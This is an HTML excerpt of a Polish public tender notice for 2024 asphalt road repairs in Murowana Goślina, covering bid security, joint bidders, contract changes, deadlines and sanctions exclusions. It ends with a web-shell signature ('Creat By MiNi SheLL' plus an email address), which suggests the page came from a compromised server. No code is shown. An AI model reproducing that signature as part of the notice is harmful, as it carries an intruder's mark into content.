umocowanie do <br/>reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której <br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa <br/>w Rozdziale XI pkt 5 ppkt 5) SWZ. Warunek ten dotyczy również odpowiednio osoby <br/>działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej <br/>treści jednoznacznie wskazywać uprawnienie do reprezentacji, <br/>g) pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się <br/>o zamówienie: konsorcja oraz spółki cywilne). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert <br/>w wysokości 2 800,00 (słownie: dwa tysiące osiemset złotych 00/100) PLN. 2. Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (t.j.: Dz. U. z 2023 r. poz. 462 ze zm.). <br/>3. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy <br/>Zamawiającego nr: Pobiedzisko - Gośliński Bank Spółdzielczy w Pobiedziskach <br/>O/Murowana Goślina nr 05 90440001 0020 0200 0156 0007, z dopiskiem: „Remont <br/>cząstkowy nawierzchni bitumicznych na terenie miasta i gminy Murowana <br/>Goślina w 2024 roku”. <br/>Uwaga! Terminem wniesienia wadium w formie pieniężnej jest data i godzina <br/>zaksięgowania kwoty wadium na rachunku bankowym Zamawiającego. <br/>4. Treść dokumentu wadialnego, w przypadku wnoszenia wadium w formach innych niż <br/>pieniądz (np. gwarancji, poręczenia) musi zawierać następujące elementy: <br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia <br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej <br/>udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, <br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia, <br/>c) kwotę gwarancji/poręczenia, <br/>d) zobowiązanie Gwaranta lub Poręczyciela do zapłacenia bezwarunkowo i <br/>nieodwołalnie pełnej kwoty gwarancji/poręczenia na pierwsze pisemne żądanie <br/>Zamawiającego w przypadkach określonych w art. 98 ust. 6 Pzp, <br/>e) gwarancja/poręczenie, stanowiące wadium, nie może wygasać przed końcem <br/>okresu związania ofertą, <br/>f) niedopuszczalne jest wprowadzanie w treści dokumentu wadialnego <br/>jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium. <br/>Wadium wnoszone w formie innej niż pieniądz (dokument wadialny) należy złożyć wraz z <br/>ofertą za pomocą platformy zakupowej Zamawiającego - jako załącznik do oferty - w <br/>oryginale wystawionym przez Gwaranta/Poręczyciela, w postaci elektronicznej, opatrzonym kwalifikowanym podpisem elektronicznym osób upoważnionych do jego <br/>wystawienia w imieniu Gwaranta/Poręczyciela. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy <br/>w sprawie zamówienia publicznego. Wówczas do oferty należy dołączyć stosowne <br/>pełnomocnictwo. Wszelka korespondencja będzie prowadzona wyłącznie z <br/>pełnomocnikiem. <br/>2. Spółka cywilna, jest kwalifikowana jako Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia dlatego jej wspólnicy, na podstawie art. 58 ust. 2 Pzp <br/>zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo <br/>reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być <br/>załączone do oferty. Jeżeli umocowanie do reprezentacji wynika z treści umowy spółki <br/>cywilnej, do oferty Wykonawcy powinni załączyć treść tej umowy. W takim przypadku <br/>nie będzie potrzebne odrębne pełnomocnictwo. Jeżeli treść oświadczenia podpisują <br/>wszyscy wspólnicy spółki cywilnej, pełnomocnictwo nie musi być przez nich dołączone <br/>do oferty. <br/>3. Oświadczenie, o którym mowa w rozdziale XI pkt 3 składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Każdy z Wykonawców <br/>występujących wspólnie musi wykazać brak podstaw do wykluczenia. Jeżeli chociażby <br/>jeden z Wykonawców podlega wykluczeniu to wykluczeniu podlega całe Konsorcjum. <br/>Oświadczenie w zakresie spełniania warunków udziału w postępowaniu składa każdy <br/>z Konsorcjantów w zakresie, w jaki każdy z nich wykazuje spełnienie warunków udziału <br/>w postępowaniu.<br/> 4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/>zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te <br/>zdolności są wymagane. <br/>5. W przypadku, o którym mowa w ustępie 4, Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia, na podstawie art. 117 ust. 4 Pzp, dołączają do oferty <br/>oświadczenie (wzór stanowi załącznik nr 2 do formularza ofertowego), z którego <br/>wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie to jest <br/>podmiotowym środkiem dowodowym. Uwzględniając powyższe Zamawiający zyskał <br/>uprawnienie wynikające z przepisów ustawy Pzp do weryfikowania na etapie <br/>przedkontraktowym rozkładu ciężaru obowiązków, jakie w przyszłości będą ciążyć na <br/>poszczególnych Wykonawcach ubiegających się wspólnie o udzielenie zamówienia. <br/>Powyższe uprawnienie ma na celu ograniczenie sytuacji w której współpraca <br/>Konsorcjanta ma charakter pozorny i kończy się wraz z uzyskaniem zamówienia, które <br/>następnie realizowane jest przez Podmioty niedysponujące potencjałem, który był <br/>warunkiem koniecznym do uzyskania zamówienia. <br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są na <br/>wezwanie Zamawiającego złożyć podmiotowe środki dowodowe potwierdzające <br/>spełnianie warunków udziału w postępowaniu, przy czym podmiotowe środki dowodowe <br/>składa: <br/>1) odpowiednio Wykonawca / Wykonawcy, który wykazuje spełnienie warunku udziału <br/>w postępowaniu,<br/> 2) każdy z Wykonawców z zakresie podstaw wykluczenia. <br/>7. W przypadku, gdy zostanie wybrana jako najkorzystniejsza oferta Wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed <br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej <br/>współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza wprowadzenie zmian umowy w następujących okolicznościach:<br/> 1) zmiany spełnienia sposobu świadczenia;<br/> 2) w zakresie podwykonawstwa; <br/>3) w zakresie dotyczącym wynagrodzenia;<br/> 4) w zakresie zmiany terminu wykonania przedmiotu umowy, <br/>5) w przypadku:<br/> a) zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w<br/> specyfikacjach technicznych wykonania i odbioru robót,<br/> b) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowane przez Zamawiającego lub<br/> Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,<br/> c) wystąpienia awarii,<br/> d) działań osób trzecich lub organów władzy publicznej,<br/> e) w zakresie dotyczącym zmiany osoby wykonującej/osób wykonujących czynności opisane w § 2 ust.3 pkt 12) lit.a) umowy<br/> f) nieprzewidzianych okoliczności formalno-prawnych,<br/> g) wystąpienia zmiany zakresu robót,<br/> h) konieczności wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia<br/> umowy, lub zmiany te są korzystne dla zamawiającego,<br/> i) zaistnienie nieprzewidzianych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo<br/> niekorzystnych warunków klimatycznych, także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na<br/> przewidzianych w niej warunkach,<br/> j) zmiany umowy w związku z przekształceniem firmy lub wynikające z następstwa prawnego, zgodnie z obowiązującymi przepisami.<br/> Szczegóły ze względów technicznych zawarto w załączniku nr 2 do SWZ- projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-19 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie zakupowej pod adresem: https://platformazakupowa.pl/transakcja/883428 (Platforma zakupowa)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-19 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j.: Dz. U. z 2023 r. poz. 1497), działając na podstawie art. 7 ust. 1 powyższej ustawy oraz art. 5 k Rozporządzenia Rady (UE)2022/576 z dnia 08.04.2022 r. w sprawie<br/> zmiany rozporządzenia (UE) nr 833/2014 <br/>dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE L/111/1) z postępowania o udzielenie zamówienia publicznego Zamawiający wykluczy Wykonawcę w przypadkach określonych w rozdziale X pkt 3 SWZ, tj.: <br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego (t.j.: Dz. U. z 2023 r. poz. 1497); <br/>2) Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t.j.: Dz. U. z 2023 r. poz. 1124) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej <br/>o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j.: Dz. U. z 2023 r. poz. 1497); <br/>3) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j.: Dz. U. z 2023 r. poz. 1497). <br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Zamawiający bada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych Wykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com